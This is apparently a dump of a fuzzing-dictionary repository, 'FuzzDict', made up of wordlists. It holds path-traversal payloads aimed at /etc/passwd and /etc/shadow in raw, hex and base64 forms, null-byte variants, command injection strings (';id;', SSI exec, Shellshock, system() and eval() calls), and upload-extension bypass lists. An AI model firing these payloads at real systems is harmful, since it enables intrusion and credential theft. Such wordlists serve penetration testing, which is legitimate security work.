| /var/log/news/news.err 666 | /var/log/news/news.notice 667 | /var/log/news/suck.err 668 | /var/log/news/suck.notice 669 | /var/log/poplog 670 | /var/log/POPlog 671 | /var/log/proftpd 672 | /var/log/proftpd.access_log 673 | /var/log/proftpd.xferlog 674 | /var/log/proftpd/xferlog.legacy 675 | /var/log/pureftpd.log 676 | /var/log/pure-ftpd/pure-ftpd.log 677 | /var/log/qmail 678 | /var/log/qmail/ 679 | /var/log/samba 680 | /var/log/samba-log.%m 681 | /var/log/secure 682 | /var/log/smtpd 683 | /var/log/spooler 684 | /var/log/syslog 685 | /var/log/telnetd 686 | /var/log/thttpd_log 687 | /var/log/utmp 688 | /var/log/vsftpd.log 689 | /var/log/wtmp 690 | /var/log/xferlog 691 | /var/log/yum.log 692 | /var/lp/logs/lpNet 693 | /var/lp/logs/lpsched 694 | /var/lp/logs/requests 695 | /var/mysql.log 696 | /var/run/httpd.pid 697 | /var/run/mysqld/mysqld.pid 698 | /var/run/utmp 699 | /var/saf/_log 700 | /var/saf/port/log 701 | /var/spool/errors 702 | /var/spool/locks 703 | /var/spool/logs 704 | /var/spool/tmp 705 | /var/www/conf/httpd.conf 706 | /var/www/html/.htaccess 707 | /var/www/localhost/htdocs/.htaccess 708 | /var/www/log/access_log 709 | /var/www/log/error_log 710 | /../../var/www/logs/access_log 711 | /var/www/logs/access_log 712 | /var/www/logs/access.log 713 | ../../../../../../../var/www/logs/access_log 714 | ../../../../../../../var/www/logs/access.log 715 | ../../../../../var/www/logs/access.log 716 | /var/www/logs/error_log 717 | /var/www/logs/error.log 718 | ../../../../../../../var/www/logs/error_log 719 | ../../../../../../../var/www/logs/error.log 720 | ../../../../../var/www/logs/error_log 721 | ../../../../../var/www/logs/error.log 722 | /var/www/sitename/htdocs/ 723 | /var/www/vhosts/sitename/httpdocs/.htaccess 724 | /var/www/web1/html/.htaccess 725 | /Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf 726 | /Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf 727 | /Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf 728 | /Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php 729 | /Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php 730 | /Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php 731 | /Volumes/Macintosh_HD1/usr/local/php/lib/php.ini 732 | /Volumes/webBackup/opt/apache2/conf/httpd.conf 733 | /Volumes/webBackup/private/etc/httpd/httpd.conf 734 | /Volumes/webBackup/private/etc/httpd/httpd.conf.default 735 | /web/conf/php.ini 736 | /WINDOWS\php.ini 737 | ../../windows/win.ini 738 | /WINNT\php.ini 739 | /..\..\..\..\..\..\winnt\win.ini 740 | /www/logs/proftpd.system.log 741 | /xampp\apache\bin\php.ini 742 | /.Xauthority 743 | ..2fapache2flogs2ferror.log 744 | ..2fapache2flogs2faccess.log 745 | ..2f..2fapache2flogs2ferror.log 746 | ..2f..2fapache2flogs2faccess.log 747 | ..2f..2f..2fapache2flogs2ferror.log 748 | ..2f..2f..2fapache2flogs2faccess.log 749 | ..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces_log 750 | ..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces.log 751 | ..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror_log 752 | ..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror.log 753 | ..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess_log 754 | ..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess.log 755 | ..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess_ log 756 | ..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess. log 757 | ..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess_log 758 | ..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess_log 759 | ..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess.log 760 | ..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess.log 761 | ..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess_log 762 | ..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess.log 763 | ..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror_log 764 | ..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror.log 765 | ..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror_l og 766 | ..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror.l og 767 | ..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror_log 768 | ..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror_log 769 | ..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror.log 770 | ..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror.log 771 | ..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror_log 772 | ..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror.log 773 | ..2fetc2fpasswd 774 | ..2fetc2fpasswd%00 775 | ..2f..2fetc2fpasswd 776 | ..2f..2fetc2fpasswd%00 777 | ..2f..2f..2fetc2fpasswd 778 | ..2f..2f..2fetc2fpasswd%00 779 | ..2f..2f..2f..2fetc2fpasswd 780 | ..2f..2f..2f..2fetc2fpasswd%00 781 | ..2f..2f..2f..2f..2fetc2fpasswd 782 | ..2f..2f..2f..2f..2fetc2fpasswd%00 783 | ..2f..2f..2f..2f..2f..2fetc2fpasswd 784 | ..2f..2f..2f..2f..2f..2fetc2fpasswd%00 785 | ..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 786 | ..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 787 | ..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 788 | ..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 789 | ..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 790 | ..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 791 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 792 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 793 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 794 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 795 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 796 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 797 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 798 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 799 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 800 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 801 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 802 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 803 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 804 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 805 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 806 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 807 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 808 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 809 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 810 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 811 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 812 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 813 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 814 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 815 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 816 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 817 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fshadow%00 818 | L2V0Yy9tYXN0ZXIucGFzc3dk 819 | L21hc3Rlci5wYXNzd2Q= 820 | ZXRjL3Bhc3N3ZA== 821 | ZXRjL3NoYWRvdyUwMA== 822 | L2V0Yy9wYXNzd2Q= 823 | L2V0Yy9wYXNzd2QlMDA= 824 | Li4vZXRjL3Bhc3N3ZA== 825 | Li4vZXRjL3Bhc3N3ZCUwMA== 826 | Li4vLi4vZXRjL3Bhc3N3ZA== 827 | Li4vLi4vZXRjL3Bhc3N3ZCUwMA== 828 | Li4vLi4vLi4vZXRjL3Bhc3N3ZA== 829 | Li4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 830 | Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 831 | Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 832 | Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 833 | Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 834 | Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 835 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 836 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 837 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 838 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 839 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 840 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 841 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 842 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 843 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 844 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 845 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 846 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 847 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 848 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 849 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 850 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 851 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 852 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 853 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 854 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 855 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 856 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 857 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 858 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 859 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 860 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 861 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 862 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 863 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 864 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 865 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 866 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 867 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3NoYWRvdyUwMA== 868 | -------------------------------------------------------------------------------- /LFI/common-ms-httpd-log-locations.txt: -------------------------------------------------------------------------------- 1 | \Program Files\Apache Group\Apache\logs\access.log 2 | \Program Files\Apache Group\Apache\logs\error.log 3 | \Program Files\Apache Group\Apache\conf\httpd.conf 4 | \Program Files\Apache Group\Apache2\conf\httpd.conf 5 | \Program Files (x86)\Apache Group\Apache\logs\access.log 6 | \Program Files (x86)\Apache Group\Apache\logs\error.log 7 | -------------------------------------------------------------------------------- /LFI/common-unix-httpd-log-locations.txt: -------------------------------------------------------------------------------- 1 | /apache/logs/error.log 2 | /apache/logs/access.log 3 | /apache/logs/error.log 4 | /apache/logs/access.log 5 | /apache/logs/error.log 6 | /apache/logs/access.log 7 | /etc/httpd/logs/acces_log 8 | /etc/httpd/logs/acces.log 9 | /etc/httpd/logs/error_log 10 | /etc/httpd/logs/error.log 11 | /var/www/logs/access_log 12 | /var/www/logs/access.log 13 | /usr/local/apache/logs/access_log 14 | /usr/local/apache/logs/access.log 15 | /var/log/apache/access_log 16 | /var/log/apache2/access_log 17 | /var/log/apache/access.log 18 | /var/log/apache2/access.log 19 | /var/log/apache2/other_vhosts_access.log 20 | /var/log/access_log 21 | /var/log/access.log 22 | /var/www/logs/error_log 23 | /var/www/logs/error.log 24 | /usr/local/apache/logs/error_log 25 | /usr/local/apache/logs/error.log 26 | /var/log/apache/error_log 27 | /var/log/apache2/error_log 28 | /var/log/apache/error.log 29 | /var/log/apache2/error.log 30 | /var/log/error_log 31 | /var/log/error.log 32 | /var/log/nginx/error.log 33 | /var/log/nginx/access.log 34 | /opt/apache2/conf/httpd.conf 35 | /opt/apache/conf/httpd.conf 36 | /opt/lampp/logs/access_log 37 | /opt/lampp/logs/access.log 38 | /opt/lampp/logs/error_log 39 | /opt/lampp/logs/error.log 40 | /opt/xampp/etc/php.ini 41 | /opt/xampp/logs/access_log 42 | /opt/xampp/logs/access.log 43 | /opt/xampp/logs/error_log 44 | /opt/xampp/logs/error.log 45 | /opt/bitnami/apache2/logs/access_log 46 | /opt/bitnami/apache2/logs/error_log 47 | /var/log/httpd/error_log 48 | /var/log/httpd/access_log 49 | /var/log/apache2/error.log 50 | /var/log/apache2/access.log 51 | /var/log/httpd-error.log 52 | /var/log/httpd-access.log -------------------------------------------------------------------------------- /NullByteRepresentations.txt: -------------------------------------------------------------------------------- 1 | %00 2 | %00%00 3 | \0 4 | \0\ 5 | \00 6 | \00\ 7 | \0\0 8 | \0\0\ 9 | \0\0 10 | \00\00\ 11 | \000 12 | \000\ 13 | \0000 14 | \0000\ 15 | \x00 16 | \x00\ 17 | \x00\x00 18 | \x00\x00\ 19 | \x0000 20 | \x0000\ 21 | \x00000000 22 | \x00000000\ 23 | \u0000 24 | \u0000\ 25 | \u00000000 26 | \u00000000\ 27 | \u0000\u0000 28 | \u0000\u0000\ 29 | \z 30 | \z\ 31 | NUL 32 | NULL 33 | nul 34 | null 35 | FALSE 36 | false 37 | 0x00 38 | 0x0000 39 | 0x00000000 40 | � 41 | � 42 | "\u0000" 43 | u"\u0000" 44 | 0 45 | 00 46 | 0000 47 | 00000000 48 | %00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00 49 | %C0%80 50 | %E0%80%80 51 | %F0%80%80%80 52 | %F8%80%80%80%80 53 | %FC%80%80%80%80%80 54 | %FE%80%80%80%80%80%80 55 | 56 | � 57 | %2500 58 | %252500 59 | %25252500 60 | %25%30%30 61 | \x%30%30 62 | %%30%30 63 | %25%2530%2530 64 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # FuzzDict 2 | 3 | 自认为比较好用的Fuzz字典,收集、筛选、整合、实践得出的高效fuzz字典。 4 | 5 | A highly efficient fuzzy dictionary that is considered useful by oneself, collected, filtered, integrated, and practiced. 6 | 7 | 感谢fuzzdb:https://github.com/fuzzdb-project/fuzzdb 8 | Thanks for fuzzdb:https://github.com/fuzzdb-project/fuzzdb 9 | -------------------------------------------------------------------------------- /cmdinjection/Linux-Command-Echo-Fuzz.txt: -------------------------------------------------------------------------------- 1 | <!--#exec%20cmd="/bin/cat%20/etc/shadow"--> 2 | <!--#exec%20cmd="/usr/bin/id;--> 3 | /index.html|id| 4 | ;id; 5 | |id| 6 | ||/usr/bin/id| 7 | ||/usr/bin/id; 8 | ;id| 9 | ;|/usr/bin/id| 10 | \nid\n 11 | \n/usr/bin/id; 12 | \nid; 13 | \n/usr/bin/id| 14 | \nid| 15 | a|id| 16 | a;id\n 17 | &&id 18 | ;id\n 19 | `id` 20 | |id 21 | | id 22 | ;id 23 | & id 24 | ;/usr/bin/id\n 25 | %0Acat%20/etc/passwd 26 | %0a id %0a 27 | %0A/usr/bin/id 28 | %0A/usr/bin/id%0A 29 | \n/usr/bin/id\n 30 | perl -e 'print "X"x1024' 31 | | perl -e 'print "X"x16096' 32 | ; perl -e 'print "X"x16096' 33 | && perl -e 'print "X"x16096' 34 | :phpversion(); 35 | ;${@print(md5(RCEVulnerable))}; 36 | ${@print("RCEVulnerable")} 37 | ${@print(system($_SERVER['HTTP_USER_AGENT']))} 38 | ;system('cat%20/etc/passwd') 39 | systeminfo 40 | | systeminfo 41 | ; systeminfo 42 | & systeminfo 43 | && systeminfo 44 | system('ls') 45 | system('pwd') 46 | system('pwd'); 47 | system('whoami'); 48 | uname 49 | ; uname 50 | & uname 51 | && uname 52 | |/usr/bin/id 53 | ;/usr/bin/id| 54 | $;/usr/bin/id 55 | | whoami 56 | ; whoami 57 | ' whoami 58 | ' & whoami 59 | ' && whoami 60 | '; whoami 61 | " whoami 62 | " || whoami 63 | " | whoami 64 | " & whoami 65 | "; whoami 66 | $(`whoami`) 67 | & whoami 68 | && whoami 69 | {{ get_user_file("/etc/hosts") }} 70 | {{ get_user_file("/etc/passwd") }} 71 | {{15264+45224}} 72 | {{person.secret}} 73 | {{person.name}} 74 | ` 75 | || 76 | | 77 | ; 78 | ' 79 | '" 80 | " 81 | "' 82 | & 83 | && 84 | %0a 85 | %0a%0d 86 | %0Aid%0A 87 | %20{${phpinfo()}} 88 | a;id| 89 | a;id; 90 | cat /etc/hosts 91 | $(`cat /etc/passwd`) 92 | cat /etc/passwd 93 | eval('whoami') 94 | eval('whoami'); 95 | 96 | 97 | 98 | \n 99 | || phpinfo() 100 | | phpinfo() 101 | {${phpinfo()}} 102 | ;phpinfo() 103 | ;phpinfo();// 104 | ';phpinfo();// 105 | {${phpinfo()}} 106 | & phpinfo() 107 | && phpinfo() 108 | phpinfo() 109 | phpinfo(); 110 | 111 | \r\n 112 | |usr/bin/id\n 113 | |nid\n 114 | `/usr/bin/id` 115 | a);id 116 | a;id 117 | a);id; 118 | a);id| 119 | a)|id 120 | a|id 121 | a)|id; 122 | |/bin/ls -al 123 | a);/usr/bin/id 124 | a;/usr/bin/id 125 | a);/usr/bin/id; 126 | a;/usr/bin/id; 127 | a);/usr/bin/id| 128 | a;/usr/bin/id| 129 | a)|/usr/bin/id 130 | a|/usr/bin/id 131 | a)|/usr/bin/id; 132 | ;system('id') 133 | ;system('/usr/bin/id') 134 | ; id 135 | 'id 136 | 'id' 137 | 'id;' 138 | ';id 139 | ';id; 140 | __import__('os').system('id') 141 | __import__("os").system("id") 142 | ';__import__('os').system('id');' 143 | ";__import__('os').system('id');" 144 | -------------------------------------------------------------------------------- /cmdinjection/Linux-Command-Graybox-Fuzz.txt: -------------------------------------------------------------------------------- 1 | <!--#exec%20cmd="/bin/cat%20/etc/passwd>/tmp/passwd1 2 | <!--#exec%20cmd="/usr/bin/id>/tmp/id1;--> 3 | /index.html|id>/tmp/id2| 4 | ;id>/tmp/id3; 5 | ;id>/tmp/id4 6 | |id>/tmp/id5 7 | |/usr/bin/id>/tmp/id6 8 | |/usr/bin/id|>/tmp/id7 9 | |id>/tmp/id8; 10 | \n/usr/bin/id>/tmp/id9\n 11 | a;id>/tmp/id12; 12 | %0Aid>/tmp/id10 13 | %0Aid>/tmp/id11%0A 14 | %20{${sleep(11)}} 15 | () { :;}; /bin/bash -c "sleep 12" 16 | cat /etc/hosts>/tmp/hosts 17 | $(`cat /etc/passwd>/tmp/passwd`) 18 | cat /etc/passwd>/tmp/passwd2 19 | eval('ls >/tmp/ls2') 20 | eval('sleep 13') 21 | eval('sleep 14'); 22 | eval('whoami >/tmp/whoami1') 23 | eval('whoami >/tmp/whoami2'); 24 | 25 | 26 | \necho INJECTX\nexit\n\033[2Asleep 16\n 27 | || perl -e 'print "X"x16096'>/tmp/perl 28 | & perl -e 'print "X"x16096'>/tmp/perl2 29 | 30 | | sleep 18 31 | ; sleep 19 32 | & sleep 21 33 | && sleep 12 34 | sleep 23 35 | || sleep 24 36 | {${sleep(26)}} 37 | & sleep 27 38 | {${sleep(hexdec(dechex(28)))}} 39 | || system('sleep 29'); 40 | | system('sleep 31'); 41 | ; system('sleep 32'); 42 | & system('sleep 33'); 43 | && system('sleep 34'); 44 | system('sleep 36') 45 | system('sleep 37'); 46 | ;uname>/tmp/uname1; 47 | | uname>/tmp/uname2 48 | ' || whoami>/tmp/whoami3 49 | " && whoami>/tmp/whoami4 50 | %0Aid>/tmp/id13 51 | exec('sleep 38') 52 | exec('sleep 39'); 53 | system('cat /etc/passwd>/tmp/passwd4'); 54 | 'id>/tmp/id111 55 | 'id>/tmp/id222' 56 | 'id>/tmp/id666;' 57 | ';id>/tmp/id888 58 | ';id>/tmp/id123; 59 | ';id>/tmp/id999;' 60 | '`id>/tmp/id2023`' 61 | ';`id>/tmp/id2022;`' 62 | __import__('os').system('sleep 41') 63 | __import__("os").system("sleep 42") 64 | ';__import__('os').system('sleep 43');' 65 | ";__import__('os').system('sleep 44');" 66 | -------------------------------------------------------------------------------- /fileupload/alt-extensions-asp.txt: -------------------------------------------------------------------------------- 1 | asp 2 | aspx 3 | asa 4 | aSP 5 | aSpx 6 | aSa 7 | asp%20%20%20 8 | aspx%20%20%20 9 | asa%20%20%20 10 | aSP%20%20%20 11 | aSpx%20%20%20 12 | aSa%20%20%20 13 | asp...... 14 | aspx...... 15 | asa...... 16 | aSP...... 17 | aSpx...... 18 | aSa...... 19 | asp%20%20%20...%20.%20.. 20 | aspx%20%20%20...%20.%20.. 21 | asa%20%20%20...%20.%20.. 22 | aSP%20%20%20...%20.%20.. 23 | aSpx%20%20%20...%20.%20.. 24 | aSa%20%20%20...%20.%20.. 25 | asp%00 26 | aspx%00 27 | asa%00 28 | aSp%00 29 | aSpx%00 30 | aSa%00 31 | -------------------------------------------------------------------------------- /fileupload/alt-extensions-jsp.txt: -------------------------------------------------------------------------------- 1 | jsp 2 | jspx 3 | jsw 4 | jsv 5 | jspf 6 | jSp 7 | jSpx 8 | jSw 9 | jSv 10 | jSpf 11 | jSp%00 12 | jSp%20%20%20 13 | jSp%20%20%20...%20.%20..a 14 | jSp...... 15 | jSpf%00 16 | jSpf%20%20%20 17 | jSpf%20%20%20...%20.%20..a 18 | jSpf...... 19 | jSpx%00 20 | jSpx%20%20%20 21 | jSpx%20%20%20...%20.%20..a 22 | jSpx...... 23 | jSv%00 24 | jSv%20%20%20 25 | jSv%20%20%20...%20.%20..a 26 | jSv...... 27 | jSw%00 28 | jSw%20%20%20 29 | jSw%20%20%20...%20.%20..a 30 | jSw...... 31 | jsp%00 32 | jsp%20%20%20 33 | jsp%20%20%20...%20.%20..a 34 | jsp...... 35 | jspf%00 36 | jspf%20%20%20 37 | jspf%20%20%20...%20.%20..a 38 | jspf...... 39 | jspx%00 40 | jspx%20%20%20 41 | jspx%20%20%20...%20.%20..a 42 | jspx...... 43 | jsv%00 44 | jsv%20%20%20 45 | jsv%20%20%20...%20.%20..a 46 | jsv...... 47 | jsw%00 48 | jsw%20%20%20 49 | jsw%20%20%20...%20.%20..a 50 | jsw...... 51 | -------------------------------------------------------------------------------- /fileupload/alt-extensions-php.txt: -------------------------------------------------------------------------------- 1 | phtml 2 | php 3 | php3 4 | php4 5 | php5 6 | inc 